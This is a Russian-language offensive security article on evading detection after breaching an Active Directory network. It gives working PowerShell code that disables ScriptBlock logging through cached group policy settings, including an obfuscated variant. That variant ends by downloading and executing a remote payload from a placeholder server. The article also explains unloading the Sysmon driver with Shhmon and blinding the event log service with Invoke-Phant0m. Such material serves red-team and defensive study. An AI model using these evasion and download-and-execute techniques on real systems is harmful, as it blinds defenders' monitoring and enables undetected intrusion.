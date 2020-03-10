Проникнуть в сеть под управлением Active Directory — это только половина успеха. Другая важнейшая задача — оставаться в этой сети незамеченным как можно дольше. Поэтому сегодня мы разберем техники скрытия атаки от конкретных средств обнаружения и реагирования.

Обход журналирования PowerShell ScriptBlock

С выходом Windows 10 и PowerShell 5.0 компания Microsoft представила несколько новых функций безопасности для PowerShell, в числе которых — ведение журнала ScriptBlock. Эта функция создает большие проблемы для атакующего (будь то редтимер, пентестер, исследователь или злоумышленник), так как регистрирует абсолютно все подозрительные действия в PowerShell. И созданные ScriptBlock журналы подлежат анализу стороной защиты.

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Как и в случае с любой службой логирования, ведением журнала ScriptBlock управляют с помощью параметров групповой политики. PowerShell запрашивает его каждый раз, когда обнаруживает новый ScriptBlock, чтобы определить, нужно ли его регистрировать. Но дело в том, что PowerShell выполняет запрос один раз, кеширует его в памяти и возвращает при каждом обращении. Таким образом, эти параметры могут быть легко изменены с помощью следующего кода.

$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static') $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null) $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0 $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0

Указанные действия можно выполнить, не обладая привилегиями администратора и не трогая реестр, что позволяет нам сделать это незаметно. Но есть одно ограничение. Новые политики применяются после проверки параметров, которые будут просмотрены, когда завершится первый SciptBlock, что приведет к регистрации события. Поэтому данный триггерный ScriptBlock должен быть максимально обфусцирован и не должен нести никакой полезной нагрузки. То есть выполняется он специально для завершения журналирования.

$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') If ($GroupPolicyField) { $GroupPolicyCache = $GroupPolicyField.GetValue($null) If ($GroupPolicyCache['ScriptB'+'lockLogging']) { $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 } $val = [System.Collections.Generic.Dictionary[string,System.Object]]::new() $val.Add('EnableScriptB'+'lockLogging', 0) $val.Add('EnableScriptB'+'lockInvocationLogging', 0) $GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val } iex (New-Object Net.WebClient).downloadstring("https://server/payload.ps1")

Приведенный выше скрипт выполняет триггер для журнала, проверяет параметры логирования и запускает полезную нагрузку в обход журналирования.

Уклонение от регистрации Sysmon

Системный монитор (Sysmon) — это системная служба Windows, предназначенная для мониторинга и регистрации активности системы в журнале событий Windows. Она предоставляет подробную информацию о создании процессов, о сетевых подключениях и изменениях времени создания файлов. Sysmon генерирует с помощью Windows Event Collection или агентов SIEM события и собирает их. Анализ собранных событий помогает идентифицировать вредоносную или аномальную активность. Что очень важно, Sysmon не предоставляет анализ событий, которые он генерирует, а также не пытается защитить систему или спрятаться от злоумышленников.

Sysmon — мощное средство анализа и представляет большую проблему для оператора, так как позволяет обнаружить различные индикаторы вредоносной активности, например создание процессов, файлов, потоков или изменение реестра. Сам Sysmon состоит из системной службы и драйвера, который предоставляет службе информацию. Хотя Sysmon и не пытается себя скрыть, но имя службы и имя драйвера по умолчанию могут быть изменены.

В любом случае измененное имя драйвера не проблема, так как у каждого драйвера есть своя аптитуда — уникальный идентификатор, который указывает положение драйвера относительно остальных в стеке файловой системы. Таким образом, Sysmon имеет предопределенное значение 385201 . То есть мы сможем обнаружить данный драйвер, даже если его переименуют.

Для выгрузки драйвера можно использовать fltMC , но перед этим Sysmon запротоколирует данное действие в журнале командной строки. Лучше использовать функции FIlterFindFirst() и FilterFindNext() из библиотеки fltlib.dll , чтобы найти и выгрузить драйвер с аптитудой 385201 без регистрации этого события.

Shhmon использует эти функции для выгрузки драйвера. Чтобы это сделать, токен процесса должен иметь привилегию SeLoadDriverPrivileges , которая имеется у Shhmon за счет advapi32!AdjustTokenPrivileges .

Таким образом, мы без детекта можем обнаружить даже переименованный драйвер Sysmon. Для этого используем Shhmon с параметром hunt .

Затем выгружаем драйвер, используя Shhmon с параметром kill .

Служба Sysmon остается активной, но уже без возможности собирать события и анализировать журналы! Правда, это происходит не бесследно, так как перед выгрузкой драйвера будет сгенерировано событие Sysmon с ID 255 — DriverCommunication .

Плюс ко всему использование привилегии SeLoadDriverPrivileges без протоколирования доступно только для NT AUTHORITY\SYSTEM , в противном случае будет сгенерировано событие безопасности с ID 4672. Тем не менее активный сбор и анализ данных с помощью Sysmon перестанет быть для нас проблемой.

В качестве дополнения можно сказать про инструмент под названием Invoke-Phant0m. Этот сценарий просматривает стеки потоков процесса службы журнала событий и определяет, какие из потоков подлежат уничтожению. Таким образом, система не сможет собирать журналы, и в то же время служба журнала событий будет работать.